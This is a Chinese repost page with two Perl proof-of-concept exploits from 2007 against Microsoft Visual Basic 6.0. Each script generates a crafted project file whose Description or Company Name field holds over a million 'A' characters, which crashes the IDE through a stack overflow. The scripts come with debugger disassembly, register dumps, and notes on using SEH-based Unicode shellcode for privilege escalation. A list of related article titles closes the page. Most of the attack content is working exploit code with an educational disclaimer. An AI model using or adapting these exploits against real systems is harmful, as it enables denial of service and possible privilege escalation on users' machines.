Mcirosoft Visual Basic 6.0的两个潜堆溢出POC
来源:互联网 发布:软件研发会计分录 编辑:程序博客网 时间:2024/05/14 12:07
Microsoft Visual Basic 6.0 Project (Description) Stack overflow PoC
#!/usr/local/bin/perl
#Discovered By UmZ (Umair Manzoor)
#comments are welcome at umz32.dll[at]gmail.com
#Dated 23-02-2007
#Time : 02:00 AM PST
#
#Stack Overflow
#Buffer Size 1037690
#overflow offset 004A2E43
#EBX contain values
#Memory to write 03B50188
#
#
#
#
#Visual Basic Project Description Stack overflow
#Affected Version : Tested on Visual basic 6
#Threats : DoS, Previlidges Escilation
#From : Local system
#
#
#Details:
# Microsoft Visual Basic 6.0 IDE crashes while parsing the project detail's field when characters more then 1037690 are provided,
# causing stack overflow (vuln1.vbp in attached file). The data is stored as UNICODE means that Shellcode can be injected in unicode manner
# to escilate previledges.
# As soon as the stack get overflow, an exception occur and NTDLL start handling it => means that SEH based exploitation will work.
# Offset is mentioned above at which IDE crash. Register EBX contain the malicious values.
# Memory address at which the malicous data (Project detail) are dumped is: 03EF0189 and on words.
#
#OVERFLOW CODE n Instructions:
#
#004A2E43 |. 8501 TEST DWORD PTR DS:[ECX],EAX
#004A2E45 |. 3D 00100000 CMP EAX,1000
#004A2E4A |.^73 EC JNB SHORT VB6.004A2E38
#004A2E4C /.^EB DB JMP SHORT VB6.004A2E29
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
# This exploit is just POC, it will generate the crafted VB project.
print("/nVisual Basic Project Description Stack overflow");
print("/nAffected Version : Tested on Visual basic 6");
print("/nThreats : DoS, Previlidges Escilation");
print("/nFrom : Local system");
print("/n----------------------------------------------");
print("/nDiscovered & Coded by UmZ");
print("/numz32.dll[at]gmail.com");
open (MYFILE, '>>Form1.frm');
print MYFILE "VERSION 5.00/n";
print MYFILE "Begin VB.Form Form1/n";
print MYFILE q(Caption = "Form1");
print MYFILE "/nClientHeight = 3495/n";
print MYFILE "ClientLeft = 60/n";
print MYFILE "ClientTop = 345/n";
print MYFILE "ClientWidth = 4680/n";
print MYFILE q(LinkTopic = "Form1");
print MYFILE "/nScaleHeight = 3495/n";
print MYFILE "ScaleWidth = 4680/n";
print MYFILE "StartUpPosition = 3 'Windows Default/n";
print MYFILE "Begin VB.CommandButton Command2/n";
print MYFILE q(Caption = "write");
print MYFILE "/nHeight = 495/n";
print MYFILE "Left = 2400/n";
print MYFILE "TabIndex = 2/n";
print MYFILE "Top = 2640/n";
print MYFILE "Width = 1935/n";
print MYFILE "End/n";
print MYFILE "Begin VB.TextBox Text1/n";
print MYFILE "Height = 2175/n";
print MYFILE "Left = 480/n";
print MYFILE "MultiLine = -1 'True/n";
print MYFILE "TabIndex = 1/n";
print MYFILE q(Text = "Form1.frx":0000);
print MYFILE "/nTop = 360/n";
print MYFILE "Width = 3855/n";
print MYFILE "End/n";
print MYFILE "Begin VB.CommandButton Command1/n";
print MYFILE q(Caption = "read");
print MYFILE "/nHeight = 495/n";
print MYFILE "Left = 480/n";
print MYFILE "TabIndex = 0/n";
print MYFILE "Top = 2640/n";
print MYFILE "Width = 1935/n";
print MYFILE "End/n";
print MYFILE "End/n";
print MYFILE q(Attribute VB_Name = "Form1");
print MYFILE "/nAttribute VB_GlobalNameSpace = False/n";
print MYFILE "Attribute VB_Creatable = False/n";
print MYFILE "Attribute VB_PredeclaredId = True/n";
print MYFILE "Attribute VB_Exposed = False/n";
close (MYFILE);
open (MYFILE, '>>vuln1.vbp');
print MYFILE "Type=Exe/n";
print MYFILE "Reference=*//G{00020430-0000-0000-C000-000000000046}#2.0#0#..//..//..//..//WINDOWS//system32//stdole2.tlb#OLE Automation/n";
print MYFILE "Reference=*//G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..//..//..//..//WINDOWS//system32//scrrun.dll#Microsoft Scripting Runtime/n";
print MYFILE "Form=Form1.frm/n";
print MYFILE q(Startup="Form1");
print MYFILE "/nHelpFile=".q("");
print MYFILE "/nCommand32=".q("");
print MYFILE "/nName=".q("Project1");
print MYFILE "/nHelpContextID=".q("0");
print MYFILE "/nDescription=".q(")."A" x1037690 .q(");
print MYFILE "/nCompatibleMode=".q("0");
print MYFILE "/nMajorVer=1";
print MYFILE "/nMinorVer=0";
print MYFILE "/nRevisionVer=0";
print MYFILE "/nAutoIncrementVer=0";
print MYFILE "/nServerSupportFiles=0";
print MYFILE "/nVersionCompanyName=".q("");
print MYFILE "/nCompilationType=0";
print MYFILE "/nOptimizationType=0";
print MYFILE "/nFavorPentiumPro(tm)=0";
print MYFILE "/nCodeViewDebugInfo=0";
print MYFILE "/nNoAliasing=0";
print MYFILE "/nBoundsCheck=0";
print MYFILE "/nOverflowCheck=0";
print MYFILE "/nFlPointCheck=0";
print MYFILE "/nFDIVCheck=0";
print MYFILE "/nUnroundedFP=0";
print MYFILE "/nStartMode=0";
print MYFILE "/nUnattended=0";
print MYFILE "/nRetained=0";
print MYFILE "/nThreadPerObject=0";
print MYFILE "/nMaxNumberOfThreads=1";
print MYFILE "/n[MS Transaction Server]";
print MYFILE "/nAutoRefresh=1";
close (MYFILE);
print("/n/nCrafted Project has been generated!!!/n/n");
Microsoft Visual Basic 6.0 Project (Company Name) Stack overflow PoC
#!/usr/local/bin/perl
#Discovered By UmZ (Umair Manzoor)
#comments are welcome at umz32.dll[at]gmail.com
#Dated 23-02-2007
#Time : 02:00 AM PST
#
#Visual Basic Project (Company Name) Stack Overflow
#Affected Version : Tested on Visual basic 6
#Threats : DoS, Previlidges Escilation (System become unstable for more then 40 minutes and so)
#From : Local system
#
#Actually Exception occur again and again and again make 100% usage of CPU
#
#
#*The vulnerability would not effect until the project description (Project Property page and select Company Name) has been opened up to view.
#
#*When binary file is generated with crafted Visual basic project it would not contain any details of vendor and other information.
#Details:
# Owned Registers are ESI and EDI. Compnay name is dumped at Memory Address of : 04520020. Due to stack overflow USER32 stuck into loop (that last # for more then 30 minutes in testing).
#
#The CPU usuage becomes 100% causing the system to become unstable and can crash the OS if enduser is on low system memory. This vulnerability can
# be exploit to cause DOS or Previledge escilation. UNICODE exploitation must be implemented in order to exploit this vulnerability.
#The generated Binary File is also attached which cann't display any of details of vendor information in EXE format (due to overflow).
#
#Debug Details:
# This is the debug details which clearly mention the loop in which exception got stuck, causing it to occur again and again
#
#77D8D96F 837D F8 00 CMP DWORD PTR SS:[EBP-8],0
#77D8D973 74 08 JE SHORT USER32.77D8D97D
#77D8D975 3C 20 CMP AL,20
#77D8D977 74 04 JE SHORT USER32.77D8D97D
#77D8D979 3C 09 CMP AL,9
#77D8D97B 75 2C JNZ SHORT USER32.77D8D9A9
#77D8D97D 3C 0D CMP AL,0D
#77D8D97F 74 28 JE SHORT USER32.77D8D9A9
#77D8D981 50 PUSH EAX
#77D8D982 53 PUSH EBX
#77D8D983 E8 68FAFFFF CALL USER32.77D8D3F0
#77D8D988 85C0 TEST EAX,EAX
#77D8D98A 75 1D JNZ SHORT USER32.77D8D9A9
#77D8D98C 47 INC EDI
#77D8D98D 8A07 MOV AL,BYTE PTR DS:[EDI]
#77D8D98F 3C 20 CMP AL,20
#77D8D991 74 04 JE SHORT USER32.77D8D997
#77D8D993 3C 09 CMP AL,9
#77D8D995 75 07 JNZ SHORT USER32.77D8D99E
#77D8D997 C745 F8 01000000 MOV DWORD PTR SS:[EBP-8],1
#77D8D99E 807F FF 0A CMP BYTE PTR DS:[EDI-1],0A
#77D8D9A2 74 05 JE SHORT USER32.77D8D9A9
#77D8D9A4 3B7D 10 CMP EDI,DWORD PTR SS:[EBP+10]
#77D8D9A7 ^72 C6 JB SHORT USER32.77D8D96F
#
#
#Values of Register are as follows:
#EAX 00000041
#ECX 09E0C300
#EDX 00150608
#EBX 001DC0C0
#ESP 0013E900
#EBP 0013E914
#ESI 04520020 ASCII #"AAAAAAAAAAAAAAAAA......... truncated
#EDI 045E61D0 ASCII #"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... truncated
#EIP 77D8D96F USER32.77D8D96F
#
#
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
# This exploit is just POC, it will generate the crafted VB project.
print("/nVisual Basic Company Name Stack overflow");
print("/nAffected Version : Tested on Visual basic 6");
print("/nThreats : DoS, Previlidges Escilation");
print("/nFrom : Local system");
print("/n----------------------------------------------");
print("/nDiscovered & Coded by UmZ");
print("/numz32.dll[at]gmail.com");
open (MYFILE, '>>Form2.frm');
print MYFILE "VERSION 5.00/n";
print MYFILE "Begin VB.Form Form1/n";
print MYFILE q(Caption = "Form1");
print MYFILE "/nClientHeight = 3495/n";
print MYFILE "ClientLeft = 60/n";
print MYFILE "ClientTop = 345/n";
print MYFILE "ClientWidth = 4680/n";
print MYFILE q(LinkTopic = "Form1");
print MYFILE "/nScaleHeight = 3495/n";
print MYFILE "ScaleWidth = 4680/n";
print MYFILE "StartUpPosition = 3 'Windows Default/n";
print MYFILE "Begin VB.CommandButton Command2/n";
print MYFILE q(Caption = "write");
print MYFILE "/nHeight = 495/n";
print MYFILE "Left = 2400/n";
print MYFILE "TabIndex = 2/n";
print MYFILE "Top = 2640/n";
print MYFILE "Width = 1935/n";
print MYFILE "End/n";
print MYFILE "Begin VB.TextBox Text1/n";
print MYFILE "Height = 2175/n";
print MYFILE "Left = 480/n";
print MYFILE "MultiLine = -1 'True/n";
print MYFILE "TabIndex = 1/n";
print MYFILE q(Text = "Form1.frx":0000);
print MYFILE "/nTop = 360/n";
print MYFILE "Width = 3855/n";
print MYFILE "End/n";
print MYFILE "Begin VB.CommandButton Command1/n";
print MYFILE q(Caption = "read");
print MYFILE "/nHeight = 495/n";
print MYFILE "Left = 480/n";
print MYFILE "TabIndex = 0/n";
print MYFILE "Top = 2640/n";
print MYFILE "Width = 1935/n";
print MYFILE "End/n";
print MYFILE "End/n";
print MYFILE q(Attribute VB_Name = "Form1");
print MYFILE "/nAttribute VB_GlobalNameSpace = False/n";
print MYFILE "Attribute VB_Creatable = False/n";
print MYFILE "Attribute VB_PredeclaredId = True/n";
print MYFILE "Attribute VB_Exposed = False/n";
close (MYFILE);
open (MYFILE, '>>vuln2.vbp');
print MYFILE "Type=Exe/n";
print MYFILE "Reference=*//G{00020430-0000-0000-C000-000000000046}#2.0#0#..//..//..//..//WINDOWS//system32//stdole2.tlb#OLE Automation/n";
print MYFILE "Reference=*//G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..//..//..//..//WINDOWS//system32//scrrun.dll#Microsoft Scripting Runtime/n";
print MYFILE "Form=Form2.frm/n";
print MYFILE q(Startup="Form2");
print MYFILE "/nHelpFile=".q("");
print MYFILE "/nCommand32=".q("");
print MYFILE "/nName=".q("Project1");
print MYFILE "/nHelpContextID=".q("0");
#print MYFILE "/nDescription=".q(")."A" x1037690 .q(");
print MYFILE "/nCompatibleMode=".q("0");
print MYFILE "/nMajorVer=1";
print MYFILE "/nMinorVer=0";
print MYFILE "/nRevisionVer=0";
print MYFILE "/nAutoIncrementVer=0";
print MYFILE "/nServerSupportFiles=0";
print MYFILE "/nVersionCompanyName=".q(")."A" x1037690 .q(");
print MYFILE "/nCompilationType=0";
print MYFILE "/nOptimizationType=0";
print MYFILE "/nFavorPentiumPro(tm)=0";
print MYFILE "/nCodeViewDebugInfo=0";
print MYFILE "/nNoAliasing=0";
print MYFILE "/nBoundsCheck=0";
print MYFILE "/nOverflowCheck=0";
print MYFILE "/nFlPointCheck=0";
print MYFILE "/nFDIVCheck=0";
print MYFILE "/nUnroundedFP=0";
print MYFILE "/nStartMode=0";
print MYFILE "/nUnattended=0";
print MYFILE "/nRetained=0";
print MYFILE "/nThreadPerObject=0";
print MYFILE "/nMaxNumberOfThreads=1";
print MYFILE "/n[MS Transaction Server]";
print MYFILE "/nAutoRefresh=1";
close (MYFILE);
print("/n/nCrafted Project has been generated!!!/n/n");
- Mcirosoft Visual Basic 6.0的两个潜堆溢出POC
- 缓冲区溢出漏洞的poc代码ruby
- 从 Visual Basic 6.0 到 Visual Basic.NET 的转换
- 从 Visual Basic 6.0 到 Visual Basic.NET 的转换
- 从 Visual Basic 6.0 到 Visual Basic.NET 的转换
- 从 Visual Basic 6.0 到 Visual Basic.NET 的转换
- 从 Visual Basic 6.0 到 Visual Basic.NET 的转换
- 从 Visual Basic 6.0 到 Visual Basic.NET 的转换
- 从 Visual Basic 6.0 到 Visual Basic.NET 的转换
- 从 Visual Basic 6.0 到 Visual Basic.NET 的转换
- 从 Visual Basic 6.0 到 Visual Basic.NET 的转换
- Visual Basic 的常见问题
- Visual Basic 6.0快捷键
- 堆溢出的研究
- 堆上的溢出
- 为更新到Visual Basic.NET准备你的Visual Basic 6.0应用程序
- 设计从 Visual Basic 6.0 到 Visual Basic .NET 的应用程序迁移策略
- 为更新到Visual Basic.NET准备你的Visual Basic 6.0应
- 神秘的黑客编程
- 用GDB调试多进程程序
- Microsoft Office 2000 (OUACTRL.OCX v. 1.0.1.9) Remote DoS Exploit
- 古板头的由来
- 如何完美应对面试
- Mcirosoft Visual Basic 6.0的两个潜堆溢出POC
- 博客飞翔
- 倒计开始
- P2P之NAT类型检测方法
- Oracle的结构组件
- 在日本想找点私活干
- 讲故事
- 欢乐周末
- DFD画在何处
